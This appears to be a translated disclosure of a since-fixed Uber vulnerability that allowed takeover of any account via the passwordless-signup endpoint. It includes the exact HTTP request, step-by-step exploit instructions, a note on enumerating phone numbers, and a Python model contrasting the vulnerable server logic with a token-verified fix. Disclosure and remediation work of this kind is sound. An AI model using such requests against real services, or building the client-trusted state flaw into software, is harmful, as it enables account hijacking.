Exploit details: vulnerability allowing an attacker to change any Uber user's password - Black Bar Safety Net

ID MYHACK58:62201676975
Type myhack58
Reporter Anonymous (佚名)
Modified 2016-07-16T00:00:00


Vulnerability status: resolved (closed)
Disclosure time: 2016-07-15 05:38
Report target: Uber
Vulnerability type: authentication
Bounty: $10,000

Vulnerability overview: Uber is a global ride-hailing app that now covers more than sixty countries and three hundred cities. While Uber's stated purpose is to give everyone a safer and more comfortable way to travel and to improve urban transport, security researchers found that through the /rt/users/passwordless-signup endpoint on Uber's server, an attacker who knows only the target user's mobile phone number can change the password of that user's Uber account. In practice the attacker does not even need a known victim: phone numbers can simply be enumerated until one that is registered to an Uber account is hit. The researchers tested the vulnerability against the passenger (rider) application, and consider it very likely that it also applies to the Uber driver application and other user roles.

Request / response: Below is the client's network request, with the user's phone number replaced by xxxx:

POST /rt/users/passwordless-signup HTTP/1.1
Host: cn-geo1.uber.com
User-Agent: client/iphone/2.137.1
Connection: close
Content-Type: application/json
Content-Length: 197

{"phoneNumberE164":"+xxxxxxxx","userWorkflow":"PASSWORDLESS_SIGNUP","userRole":"client","mobileCountryISO2":"XX","state":"CREATE_NEW_PASSWORD","newPasswordData":{"newPassword":"12345678911a!"}}

The server's response to this request is as follows:

{"phoneNumberE164":"+xxxxxxxx","serverState":"SUCCEEDED","serverStateData":{"nextState":"SIGN_IN"},"tripVerifyStateData":{},"userMessage":"New password has been created. Please login with the new Password.","userRole":"client","userWorkflow":"PASSWORDLESS_SIGNUP"}

Exploit procedure: First, create a new Uber passenger account. The researchers used the iOS application for the experiment, but the vulnerability is not tied to any particular client platform. After registering successfully, send the request shown above to Uber's server again, but before sending it change the value of "phoneNumberE164" to the phone number bound to the target account. The number must be in E.164 form, that is, the country calling code prefixed with "+" followed by the number; for a US mobile phone, for example, the prefix is +1. In some cases the request has to be sent twice, otherwise the server may not return a response. Finally the server replies with the "New password has been created" message, which means the target account's login password has been replaced; the account's new password is the value of the "newPassword" field in the request. The account can then be logged into at http://riders.uber.com/ or anywhere else using that password.

The root cause visible in the exchange is that the client, not the server, chooses the "state" of the passwordless-signup workflow: the server honours "CREATE_NEW_PASSWORD" for whatever phone number the request names, without having verified that the caller controls that number.

Uber has long been a favourite target of attackers. Back in 2014 Uber suffered a serious data breach in which the names and driver's license numbers of about 50,000 Uber drivers were stolen. In the first half of 2016, large numbers of Uber account credentials appeared for sale on dark web markets, another large leak of user information. Uber's engineers should really take a hard look at the security of their products.
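As an added example (not the report's or Uber's own code), the following Python models the server side of the exchange above: a version that, like the vulnerable endpoint, acts on a client-chosen state of CREATE_NEW_PASSWORD for any phone number, beside a fixed version that only sets a password when the request carries a server-issued proof that an SMS code for that same number was just verified. The server classes, the "verificationToken" field and its HMAC format, the send/verify-code steps and the hash function are all assumptions for illustration; only the request body is taken from the report.

```python
"""Toy model of the passwordless-signup state machine: vulnerable vs fixed.
Added example, not Uber's code. All class, field and token names are
hypothetical; the request body below is the one from the report."""
import hashlib
import hmac
import json
import secrets
import time

# Constructed sample: the attacker's request body from the report, phone
# number redacted exactly as the report redacts it.
ATTACKER_BODY = json.loads(
    '{"phoneNumberE164":"+xxxxxxxx","userWorkflow":"PASSWORDLESS_SIGNUP",'
    '"userRole":"client","mobileCountryISO2":"XX","state":"CREATE_NEW_PASSWORD",'
    '"newPasswordData":{"newPassword":"12345678911a!"}}'
)


def hash_password(pw: str) -> str:
    # Demo only; a real service would use a salted, memory-hard KDF.
    return hashlib.sha256(pw.encode()).hexdigest()


class VulnerableServer:
    """Trusts the client-supplied 'state': a caller can jump straight to
    CREATE_NEW_PASSWORD for any phone number without proving ownership."""

    def __init__(self, accounts: dict):
        self.accounts = accounts  # phoneNumberE164 -> password hash

    def passwordless_signup(self, body: dict) -> dict:
        phone = body["phoneNumberE164"]
        if body["state"] == "CREATE_NEW_PASSWORD":
            # BUG: no check that this caller ever verified a code for `phone`.
            self.accounts[phone] = hash_password(body["newPasswordData"]["newPassword"])
            return {"phoneNumberE164": phone, "serverState": "SUCCEEDED",
                    "serverStateData": {"nextState": "SIGN_IN"}}
        return {"phoneNumberE164": phone, "serverState": "FAILED"}


class FixedServer:
    """CREATE_NEW_PASSWORD succeeds only with a short-lived, single-use token
    that the server itself issued after the SMS code for that number was verified."""

    TTL = 300  # seconds a code or token stays valid (assumed value)

    def __init__(self, accounts: dict, key: bytes):
        self.accounts = accounts
        self.key = key          # HMAC key for verification tokens
        self.pending = {}       # phone -> (code, expiry)
        self.used = set()       # tokens already spent

    def send_code(self, phone: str) -> str:
        # Returned here so the demo can drive the flow; really it goes out by SMS.
        code = f"{secrets.randbelow(10**6):06d}"
        self.pending[phone] = (code, time.time() + self.TTL)
        return code

    def verify_code(self, phone: str, code: str):
        rec = self.pending.pop(phone, None)  # one attempt per issued code
        if rec is None or time.time() > rec[1] or not hmac.compare_digest(rec[0], code):
            return None
        exp = int(time.time()) + self.TTL
        sig = hmac.new(self.key, f"{phone}|{exp}".encode(), hashlib.sha256).hexdigest()
        return f"{exp}.{sig}"  # token is bound to this phone number

    def _token_ok(self, phone: str, token) -> bool:
        if not isinstance(token, str) or "." not in token or token in self.used:
            return False
        exp_s, sig = token.split(".", 1)
        if not exp_s.isdigit() or int(exp_s) < time.time():
            return False
        expect = hmac.new(self.key, f"{phone}|{exp_s}".encode(), hashlib.sha256).hexdigest()
        if not hmac.compare_digest(expect, sig):
            return False
        self.used.add(token)
        return True

    def passwordless_signup(self, body: dict) -> dict:
        phone = body["phoneNumberE164"]
        if body["state"] == "CREATE_NEW_PASSWORD":
            if not self._token_ok(phone, body.get("verificationToken")):
                return {"phoneNumberE164": phone, "serverState": "FAILED"}
            self.accounts[phone] = hash_password(body["newPasswordData"]["newPassword"])
            return {"phoneNumberE164": phone, "serverState": "SUCCEEDED",
                    "serverStateData": {"nextState": "SIGN_IN"}}
        return {"phoneNumberE164": phone, "serverState": "FAILED"}


def demo():
    victim = ATTACKER_BODY["phoneNumberE164"]
    original = hash_password("victim-original-password")

    vuln = VulnerableServer({victim: original})
    r1 = vuln.passwordless_signup(ATTACKER_BODY)
    takeover = r1["serverState"] == "SUCCEEDED" and vuln.accounts[victim] != original

    fixed = FixedServer({victim: original}, key=secrets.token_bytes(32))
    r2 = fixed.passwordless_signup(ATTACKER_BODY)
    blocked = r2["serverState"] == "FAILED" and fixed.accounts[victim] == original

    # Legitimate owner: receives the code, verifies it, then sets the password.
    token = fixed.verify_code(victim, fixed.send_code(victim))
    legit = dict(ATTACKER_BODY, verificationToken=token)
    owner_ok = fixed.passwordless_signup(legit)["serverState"] == "SUCCEEDED"
    replay = fixed.passwordless_signup(legit)["serverState"]  # token is single use
    return takeover, blocked, owner_ok, replay


if __name__ == "__main__":
    print(demo())
```

Running it shows the attacker's body accepted by the first server and rejected by the second, while the legitimate flow still succeeds and the verification token cannot be replayed. The enumeration point made above implies two further controls not modelled here: rate-limit the endpoint per phone number and per source, and keep the response identical whether or not the number is registered.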